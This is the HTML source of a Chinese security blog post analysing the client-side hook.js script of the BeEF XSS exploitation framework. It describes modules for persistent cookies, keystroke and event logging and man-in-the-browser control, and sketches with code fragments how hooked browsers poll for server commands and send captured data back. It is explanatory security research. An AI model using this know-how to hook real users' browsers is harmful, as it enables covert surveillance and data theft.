-
Notifications
You must be signed in to change notification settings - Fork 5
/
beef-xss-framework-exploit.html
430 lines (327 loc) · 20.4 KB
/
beef-xss-framework-exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
<!doctype html>
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]-->
<!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<![endif]-->
<head>
<meta charset="utf-8">
<title>BeEF XSS利用框架客户端脚本浅析 – KINGX</title>
<meta name="description" content="beef xss exploit framework">
<meta name="keywords" content="xss, beef">
<!-- Twitter Cards -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://kingx.me/images/abstract-8.jpg">
<meta name="twitter:title" content="BeEF XSS利用框架客户端脚本浅析">
<meta name="twitter:description" content="beef xss exploit framework">
<meta name="twitter:creator" content="@https://twitter.com/KINGX_CN">
<!-- Open Graph -->
<meta property="og:locale" content="en_US">
<meta property="og:type" content="article">
<meta property="og:title" content="BeEF XSS利用框架客户端脚本浅析">
<meta property="og:description" content="beef xss exploit framework">
<meta property="og:url" content="https://kingx.me/beef-xss-framework-exploit.html">
<meta property="og:site_name" content="KINGX">
<link rel="canonical" href="https://kingx.me/beef-xss-framework-exploit.html">
<link href="https://kingx.me/feed.xml" type="application/atom+xml" rel="alternate" title="KINGX Feed">
<!-- http://t.co/dKP3o1e -->
<meta name="HandheldFriendly" content="True">
<meta name="MobileOptimized" content="320">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- For all browsers -->
<link rel="stylesheet" href="https://kingx.me/assets/css/main.css">
<!-- Webfonts -->
<link href="//fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic" rel="stylesheet" type="text/css">
<meta http-equiv="cleartype" content="on">
<!-- Load Modernizr -->
<script src="https://kingx.me/assets/js/vendor/modernizr-2.6.2.custom.min.js"></script>
<!-- Icons -->
<!-- 16x16 -->
<link rel="shortcut icon" href="https://kingx.me/favicon.ico">
<!-- 32x32 -->
<link rel="shortcut icon" href="https://kingx.me/favicon.png">
<!-- 57x57 (precomposed) for iPhone 3GS, pre-2011 iPod Touch and older Android devices -->
<link rel="apple-touch-icon-precomposed" href="https://kingx.me/images/apple-touch-icon-precomposed.png">
<!-- 72x72 (precomposed) for 1st generation iPad, iPad 2 and iPad mini -->
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://kingx.me/images/apple-touch-icon-72x72-precomposed.png">
<!-- 114x114 (precomposed) for iPhone 4, 4S, 5 and post-2011 iPod Touch -->
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://kingx.me/images/apple-touch-icon-114x114-precomposed.png">
<!-- 144x144 (precomposed) for iPad 3rd and 4th generation -->
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://kingx.me/images/apple-touch-icon-144x144-precomposed.png">
</head>
<body id="post" class="feature">
<!--[if lt IE 9]><div class="upgrade"><strong><a href="http://whatbrowser.org/">Your browser is quite old!</strong> Why not upgrade to a different browser to better enjoy this site?</a></div><![endif]-->
<nav id="dl-menu" class="dl-menuwrapper" role="navigation">
<button class="dl-trigger">Open Menu</button>
<ul class="dl-menu">
<li><a href="https://kingx.me/">Home</a></li>
<li>
<a href="#">About</a>
<ul class="dl-submenu">
<li>
<img src="https://kingx.me/images/avatar.jpg" alt="KINGX photo" class="author-photo">
<h4>KINGX</h4>
<p>What is Security</p>
</li>
<li><a href="https://kingx.me/about/"><span class="btn btn-inverse">Learn More</span></a></li>
<li>
<a href="mailto:root#kingx.me"><i class="fa fa-fw fa-envelope"></i> Email</a>
</li>
<li>
<a href="https://twitter.com/KINGX_CN"><i class="fa fa-fw fa-twitter"></i> Twitter</a>
</li>
<li>
<a href="https://weibo.com/u/1624430122"><i class="fa fa-fw fa-weibo"></i> Weibo</a>
</li>
<li>
<a href="https://github.com/KINGX-Code"><i class="fa fa-fw fa-github"></i> GitHub</a>
</li>
</ul><!-- /.dl-submenu -->
</li>
<!-- <li>
<a href="#">Posts</a>
<ul class="dl-submenu">
<li><a href="https://kingx.me/posts/">All Posts</a></li>
<li><a href="https://kingx.me/tags/">All Tags</a></li>
</ul>
</li> -->
<li><a href="https://kingx.me/latest-events/" >Security Incidents</a></li>
<li><a href="https://kingx.me/latest-vulns/" >Vulnerabilities</a></li>
<li><a href="https://kingx.me/pentest-tools/" >Red Team</a></li>
<li><a href="https://kingx.me/cheatsheet/" >CheatSheet</a></li>
<li><a href="https://kingx.me/stop-learning/" >Stop Learning</a></li>
<li><a href="https://kingx.me/posts/" >Archives</a></li>
<li><a href="https://kingx.me/tags/" >Tags</a></li>
<li><a href="https://kingx.me/links/" >Links</a></li>
<li><a href="https://kingx.me/feed.xml" >RSS</a></li>
</ul><!-- /.dl-menu -->
</nav><!-- /.dl-menuwrapper -->
<div class="entry-header">
<div class="entry-image">
<img src="https://kingx.me/images/abstract-8.jpg" alt="BeEF XSS利用框架客户端脚本浅析">
</div><!-- /.entry-image -->
</div><!-- /.entry-header -->
<div id="main" role="main">
<article class="hentry">
<header class="header-title">
<div class="header-title-wrap">
<h1 class="entry-title"><a href="https://kingx.me/beef-xss-framework-exploit.html" rel="bookmark" title="BeEF XSS利用框架客户端脚本浅析">BeEF XSS利用框架客户端脚本浅析</a></h1>
<h2><span class="entry-date date published"><time datetime="2012-11-14T00:00:00-05:00">November 14, 2012, KINGX</time></span></h2>
<p class="entry-reading-time">
<i class="fa fa-clock-o"></i>
Reading time ~1 minute
<span id="busuanzi_container_page_pv">
/ Page View <span id="busuanzi_value_page_pv">0</span> / Site Visitor <span id="busuanzi_value_site_uv">0</span>
</span>
</p><!-- /.entry-reading-time -->
</div><!-- /.header-title-wrap -->
</header>
<div class="entry-content">
<span class="entry-tags" style="color:red;font-size:13px;margin-bottom: 0px;">「声明:本博客中涉及到的相关漏洞均为官方已经公开并修复的漏洞,涉及到的安全技术也仅用于企业安全建设和安全对抗研究。本文仅限业内技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。」</span>
<p>BeEF是比较著名的一个XSS利用框架,它是交互界面友好、高度集成、开源、活跃度较高的一个项目。</p>
<p>在BT5中也集成了BeEF。跟国外其他渗透测试项目一样,它也可以和其他很多工具结合使用,如MSF。但是网上相关资料不太好找,于是前段时间自己看了一下BeEF的客户端JS脚本代码。</p>
<p>BeEF框架客户端脚本文件hook.js的主要结构如下:</p>
<table rules="groups">
<thead>
<tr>
<th style="text-align: left">JS模块</th>
<th style="text-align: center">功能分析</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">jquery</td>
<td style="text-align: center">jequry库</td>
</tr>
<tr>
<td style="text-align: left">evercookie</td>
<td style="text-align: center">cookie僵尸,利用多处存放、相互依存的方式保证cookie的不可销毁。</td>
</tr>
</tbody>
<tbody>
<tr>
<td style="text-align: left">beef</td>
<td style="text-align: center">主要包括: <br />1. commands数组等来存放从服务器获得的指令。<br />2. components数组来存放模块。<br />3. execute(fn)将待执行函数压入commands数组队列。<br />4. regCmp(com)将模块压入components数组</td>
</tr>
</tbody>
<tbody>
<tr>
<td style="text-align: left">beef.browser</td>
<td style="text-align: center">获得和存放浏览器信息的对象。getdetail返回存放浏览器详细信息的数组。</td>
</tr>
<tr>
<td style="text-align: left">beef.browser.cookie</td>
<td style="text-align: center">对浏览器cookie进行操作的函数。</td>
</tr>
<tr>
<td style="text-align: left">beef.browser.popup</td>
<td style="text-align: center">判断浏览器是否拦截弹窗。(貌似判断的不太准确)</td>
</tr>
<tr>
<td style="text-align: left">beef.session</td>
<td style="text-align: center">创建和管理一个Zombie的session标识。</td>
</tr>
<tr>
<td style="text-align: left">beef.os</td>
<td style="text-align: center">通过浏览器ua判断Zombie的操作系统。注册为beef.net.os</td>
</tr>
<tr>
<td style="text-align: left">beef.hardware</td>
<td style="text-align: center">通过浏览器ua判断Zombie的设备类型。注册为beef.net.hardware</td>
</tr>
<tr>
<td style="text-align: left">beef.dom</td>
<td style="text-align: center">对浏览器dom对象的操作,创建iframe、form、更换链接地址等等。</td>
</tr>
<tr>
<td style="text-align: left">beef.logge</td>
<td style="text-align: center">客户端的事件记录器,click、focus、submit、keypress等,并将捕获的数据存储,调用logger.queue函数将data传给beef.net.queue</td>
</tr>
<tr>
<td style="text-align: left">beef.encode</td>
<td style="text-align: center">定义了一些编码,base64编码、json解析等</td>
</tr>
<tr>
<td style="text-align: left">beef.net</td>
<td style="text-align: center">客户端与服务端之间的通信,对请求与响应的处理进行封装。包括向服务器命令执行结果、提交请求并处理服务器返回的相应。定义了服务端IP、端口、hook文件、handler文件等 。</td>
</tr>
<tr>
<td style="text-align: left">beef.updater</td>
<td style="text-align: center">循环获得服务器js指令并执行。定义了指令的获取和执行等函数。</td>
</tr>
<tr>
<td style="text-align: left">beef.mitb</td>
<td style="text-align: center">浏览器中间人</td>
</tr>
<tr>
<td style="text-align: left">beef.net.local</td>
<td style="text-align: center">其他</td>
</tr>
<tr>
<td style="text-align: left">beef.net.dns</td>
<td style="text-align: center">其他</td>
</tr>
<tr>
<td style="text-align: left">beef.are</td>
<td style="text-align: center">其他</td>
</tr>
</tbody>
<tbody>
<tr>
<td style="text-align: left">init代码段</td>
<td style="text-align: center">初始化:执行完指令队列内的指令、开始事件记录、执行updater.check()循环。</td>
</tr>
</tbody>
<tfoot>
<tr>
<td style="text-align: left">JS模块</td>
<td style="text-align: center">功能分析</td>
</tr>
</tfoot>
</table>
<h3 id="关于客户端指令的获取和执行">关于客户端指令的获取和执行</h3>
<p>hook.js会将初始化函数与window.onload事件绑定,在进行初始化时会调用beef.updater的check()方法。该方法会循环执行。首先保存事件键盘记录logger的为保存数据,再上传所有结果队列cmd_queue中的数据,然后判断指令队列commands中长度是否大于零,是则执行命令,否则通过ajax从服务器端请求文件,请求类型为script,即获取脚本内容并执行。脚本内容格式为”beef.execute(//指令内容)”,执行后会将指令内容压入待执行的指令队列commands对象中。
如需返回指令执行之后的结果,则指令语句需判断满足某一条件后,调beef.net.send(data)方法,将获得到的数据传回服务端。</p>
<p><strong>指令轮询函数的执行顺序流程</strong></p>
<figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="c1">//循环从服务端拉去指令并执行</span>
<span class="nx">updater</span><span class="p">.</span><span class="nx">check</span><span class="p">()</span>
<span class="mi">1</span><span class="p">.</span> <span class="nx">logger</span><span class="p">.</span><span class="nx">queue</span><span class="p">()</span>
<span class="mi">2</span><span class="p">.</span> <span class="nx">net</span><span class="p">.</span><span class="nx">flush</span><span class="p">()</span>
<span class="mi">3</span><span class="p">.</span> <span class="nx">execute_commands</span><span class="p">();</span><span class="nx">get_commands</span><span class="p">();</span>
<span class="mi">4</span><span class="p">.</span> <span class="nx">setTimeout</span><span class="p">(</span><span class="s2">"beef.updater.check();"</span><span class="p">,</span> <span class="nx">beef</span><span class="p">.</span><span class="nx">updater</span><span class="p">.</span><span class="nx">timeout</span><span class="p">);</span>
<span class="c1">//任务/数据队列</span>
<span class="nx">logger</span><span class="p">.</span><span class="nx">queue</span>
<span class="c1">//传进来的result数据处理成net里的command对象,results中字符串数组转换成json对象</span>
<span class="nx">net</span><span class="p">.</span><span class="nx">queue</span><span class="p">()</span>
<span class="c1">//压入队列</span>
<span class="nx">cmd_queue</span><span class="p">.</span><span class="nx">push</span><span class="p">()</span>
<span class="c1">//指令执行结果回传</span>
<span class="nx">net</span><span class="p">.</span><span class="nx">send</span>
<span class="nx">net</span><span class="p">.</span><span class="nx">queue</span> <span class="c1">//将数据压入cmd_queue</span>
<span class="nx">flush</span> <span class="c1">//发送所有cmd_queue队列内的请求,将队列内请求分块</span>
<span class="nx">push</span> <span class="c1">//按照PC分组,逐个发送</span>
<span class="nx">request</span> <span class="c1">//发送请求的底层方法</span></code></pre></figure>
<p><strong>获取的指令的</strong></p>
<p>服务端下发的指令格式为:</p>
<figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="nx">beef</span><span class="p">.</span><span class="nx">execute</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span><span class="nx">xxx</span><span class="p">});</span>
<span class="c1">//beef.execute将function()压入commands</span></code></pre></figure>
<p><strong>回传结果的例子</strong></p>
<figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="nx">beef</span><span class="p">.</span><span class="nx">net</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'/command/pretty_theft.js'</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="s1">'answer='</span><span class="o">+</span><span class="nx">answer</span><span class="p">);</span></code></pre></figure>
<footer class="entry-meta">
<span class="entry-tags" style="color:black;font-size:13px;margin-bottom: 0px;">欢迎订阅我的微信公众号</span>
<img src="/images/secengine.jpg" alt="welcome subscribe"/>
<span class="entry-tags"><a href="https://kingx.me/tags/#xss" title="Pages tagged xss" class="tag"><span class="term">xss</span></a><a href="https://kingx.me/tags/#beef" title="Pages tagged beef" class="tag"><span class="term">beef</span></a></span>
<span>Updated on <span class="entry-date date updated"><time datetime="2016-04-06">April 06, 2016</time></span></span>
<span class="author vcard"><span class="fn">KINGX</span></span>
<div class="social-share">
<ul class="socialcount socialcount-small inline-list">
<li class="weibo"><a href="http://service.weibo.com/share/share.php?title=分享KINGX的文章《BeEF XSS利用框架客户端脚本浅析》&url=https://kingx.me/beef-xss-framework-exploit.html&source=bookmark" title="Share on Weibo" target="_blank"><span class="count"><i class="fa fa-weibo"></i> WEIBO</span></a></li>
<li class="facebook"><a href="https://www.facebook.com/sharer/sharer.php?u=https://kingx.me/beef-xss-framework-exploit.html" title="Share on Facebook"><span class="count"><i class="fa fa-facebook-square"></i> Like</span></a></li>
<li class="twitter"><a href="https://twitter.com/intent/tweet?text=https://kingx.me/beef-xss-framework-exploit.html" title="Share on Twitter"><span class="count"><i class="fa fa-twitter-square"></i> Tweet</span></a></li>
<li class="googleplus"><a href="https://plus.google.com/share?url=https://kingx.me/beef-xss-framework-exploit.html" title="Share on Google Plus"><span class="count"><i class="fa fa-google-plus-square"></i> +1</span></a></li>
</ul>
</div><!-- /.social-share -->
<!--
<div class="ds-share" data-thread-key="/beef-xss-framework-exploit" data-title="BeEF XSS利用框架客户端脚本浅析" data-images="" data-content="BeEF XSS利用框架客户端脚本浅析" data-url="https://kingx.me/beef-xss-framework-exploit.html">
<div class="ds-share-inline">
<ul class="ds-share-icons-16">
<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到:</a></li>
<li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
<li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
<li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
<li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
</ul>
<div class="ds-share-icons-more">
</div>
</div>
</div>
-->
</footer>
</div><!-- /.entry-content -->
<div class="read-more">
<div class="read-more-header">
<a href="https://kingx.me/about-oauth2-security.html" class="read-more-btn">Read More</a>
</div><!-- /.read-more-header -->
<div class="read-more-content">
<h3><a href="https://kingx.me/Patch-log4j.html" title="Log4j 严重漏洞修复方案参考 CVE-2021-44228">Log4j 严重漏洞修复方案参考 CVE-2021-44228</a></h3>
<p>CVE-2021-44228 <a href="https://kingx.me/Patch-log4j.html">Continue reading</a></p>
</div><!-- /.read-more-content -->
<div class="read-more-list">
<div class="list-item">
<h4><a href="https://kingx.me/Thinking-about-the-RedTeam-Engagement.html" title="浅谈大规模红蓝对抗攻与防">浅谈大规模红蓝对抗攻与防</a></h4>
<span>Published on October 12, 2020</span>
</div><!-- /.list-item -->
<div class="list-item">
<h4><a href="https://kingx.me/Exploit-FastJson-Without-Reverse-Connect.html" title="Java动态类加载,当FastJson遇到内网">Java动态类加载,当FastJson遇到内网</a></h4>
<span>Published on December 31, 2019</span>
</div><!-- /.list-item -->
</div><!-- /.read-more-list -->
</div><!-- /.read-more -->
</article>
</div><!-- /#main -->
<div class="footer-wrapper">
<footer role="contentinfo">
<span>© 2023 KINGX. Powered by Jekyll using the HPSTR Theme.</span>
</footer>
</div><!-- /.footer-wrapper -->
<!--<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>-->
<!-- <script src="http://libs.baidu.com/jquery/1.9.1/jquery.min.js"></script> -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="https://kingx.me/assets/js/vendor/jquery-1.9.1.min.js"><\/script>')</script>
<script src="https://kingx.me/assets/js/scripts.min.js"></script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
if(location.host=="kingx.me"){
hm.src = "https://hm.baidu.com/hm.js?d11d8512e0bc6992b9c9bbf2d266ce31";
}else if(location.host=="kingx.sinaapp.com"){
hm.src = "https://hm.baidu.com/hm.js?d1b3dbd97b73868454f102755fdf51ba";
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<!-- Busuanzi Analytics -->
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>